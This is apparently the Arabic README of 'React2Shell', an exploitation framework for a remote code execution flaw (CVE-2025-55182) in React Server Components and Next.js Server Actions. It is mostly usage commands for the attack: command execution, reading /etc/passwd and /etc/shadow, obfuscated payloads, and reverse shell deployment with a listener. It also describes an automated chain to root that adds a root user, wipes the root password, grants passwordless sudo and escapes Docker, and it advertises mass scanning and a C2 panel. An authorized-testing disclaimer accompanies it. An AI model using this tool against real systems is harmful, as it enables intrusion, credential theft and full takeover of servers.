
مجموعة أدوات استغلال متطورة لـ CVE-2025-55182 (ثغرة تنفيذ الأوامر في مكونات خادم React). حمولات متعددة الأشكال غير متزامنة، تجاوز متقدم لجدار الحماية وشبكة توصيل المحتوى (WAF/CDN)، تدوير الوكيل، مسح جماعي عبر Shodan/Censys، اختراق تلقائي مع قذائف عكسية، قوالب Nuclei، مختبر K8s ولوحة تحكم C2. من تأليف Sudeepa Wanigarathna – مخصصة فقط لاختبار الاختراق والاختبارات الأمنية المصرح بها.
██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██╗
██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║ ██║
██║ █████╗ ██████╔╝██████╔╝█████╗ ██████╔╝██║ ██║
██║ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██╔══██╗██║ ██║
╚██████╗ ███████╗██║ ██║██████╔╝███████╗██║ ██║╚██████╔╝
╚═════╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝
React2Shell Exploitation Framework v1.0
Author: Sudeepa Wanigarathna
إطار استغلال احترافي لثغرة RCE في Next.js Server Actions (React2Shell). يوضح سلسلة الهجوم الكاملة من الوصول الأولي إلى تصعيد الصلاحيات إلى الجذر.
القدرات:
# فحص الثغرة
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# تنفيذ أمر
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"
python3 interactive_shell.py --target http://127.0.0.1:3000
# استغلال كامل: RCE → تعداد → وصول إلى الجذر
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py # محرك الاستغلال الأساسي (400+ سطر)
├── demo_exploit.py # سلسلة هجوم تلقائية (290+ سطر)
├── interactive_shell.py # شل تفاعلية (280+ سطر)
├── reverse_shell_handler.py # مستمع الشل العكسي (180+ سطر)
├── post_exploit/
│ ├── linux_enum.py # تعداد النظام (330+ سطر)
│ ├── priv_esc.py # تصعيد الصلاحيات (320+ سطر)
│ └── __init__.py
├── EXPLOITATION_GUIDE.md # توثيق الاستخدام الكامل
├── QUICKSTART.md # مرجع سريع
└── BANNER.txt
# فحص الثغرة
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# تنفيذ أوامر
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"
# إصدارات حمولة مختلفة
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn
# مع الإخفاء
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate
# تشغيل الشل
python3 interactive_shell.py --target http://127.0.0.1:3000
# الأوامر المتاحة:
# - execute <cmd> : تنفيذ أمر شل
# - enum : تشغيل تعداد كامل
# - escalate : محاولة تصعيد الصلاحيات
# - upload <local> <remote> : رفع ملف
# - download <remote> <local>: تنزيل ملف
# - shell <lhost> <lport>: نشر شل عكسي
# - info : عرض معلومات الجلسة
# - exit : خروج
# الطرفية 1: تشغيل المستمع
python3 reverse_shell_handler.py --lport 4444
# الطرفية 2: نشر الشل
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
--revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash
# السلسلة الكاملة: اكتشاف → RCE → تعداد → جذر
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
ينفذ الإطار سلسلة استغلال كاملة من 6 خطوات:
id/etc/shadow وسرد محتويات /rootملفات SUID (GTFOBins)
ملفات /etc قابلة للكتابة
/etc/passwd - إضافة مستخدم جذر جديد/etc/shadow - مسح كلمة مرور الجذر/etc/sudoers - منح صلاحيات sudo بدون كلمة مرورهروب Docker
استغلال النواة
قدرات لينكس
pip install -r requirements.txt
التبعيات:
EXPLOITATION_GUIDE.md - دليل الاستخدام الكامل مع الأمثلةQUICKSTART.md - مرجع سريع للأوامر الشائعةتحذير: هذه الأداة مخصصة لاختبارات الأمان المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. استخدم فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
المؤلف غير مسؤول عن أي استخدام خاطئ لهذه الأداة. الاستخدام على مسؤوليتك الخاصة.
صمم هذا الإطار من أجل:
MIT License (لأغراض تعليمية فقط)
Sudeepa Wanigarathna
الإصدار: 1.0
آخر تحديث: ديسمبر 2025
حالة المختبر: http://127.0.0.1:3000 (قيد التشغيل)
للحصول على تعليمات استخدام مفصلة، راجع EXPLOITATION_GUIDE.md